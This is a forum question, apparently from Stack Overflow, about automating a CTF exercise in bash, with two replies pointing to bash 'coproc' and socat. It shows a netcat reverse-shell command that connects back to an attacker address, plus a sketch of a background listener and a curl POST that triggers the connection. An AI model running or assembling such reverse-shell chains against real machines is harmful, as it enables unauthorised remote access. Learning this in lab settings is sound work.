# Reverse shells and bash

Tags: bash, shell

I'm doing an exercise (basically just a CTF), where we do some exploits of some vulnerable machines. For example, by sending a specially crafted post request, we can make it execute for example

```
nc -e /bin/bash 10.0.0.2 2546
```

What I want to do, is to script my way out of this, to make it easier.

1. Setup a listener for a specific port
2. Send a post request to make the machine connect back
3. Send arbitrary data to the server, e.g. to escalate privileges.
4. Present user with the shell (e.g. which is sent through nc)

This is not a post on how to either hack it or escalate privileges, but my scripting capabilities (especially in bash!) is not the best.

The problem is when I reach step 2. For obvious reason, I can't start `nc -lvp 1234` before sending the post request, since it blocks. And I'm faily sure multithreading in bash is not possible (...somebody have probably made it though.)

```
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data  
* MAGIC CONNECTION *
```

And let's say that I actually succeed with a connection back home, how would I manage to send data from my script, though netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file, and use that as a "buffer"?

I know there is a lot of questions, and it can't be answered with one answer, but I'd like to hear more about how people would do that. OR if it's completely ridiculous to do in bash.

Comment: ...what does multithreading have to do with anything? It would be helpful if you could present a [mcve] with existing code and a success condition -- ie. "I have this code, which should when run do X; however, it blocks at step A instead of doing Y". And yes, ideally, that code should avoid anything (like privilege escalation, &c) that would be out-of-scope for the narrow question.

Comment: If you just want to know how to start a coprocess (a concurrently-running program with its own stdin and stdout which can be independently interacted with), see the `coproc` builtin in bash 4.0 and later. If you want some good ideas about what an easy programmatic interface for the purpose looks like, have a look at `socat`, which is a bit easier to work with than `nc`.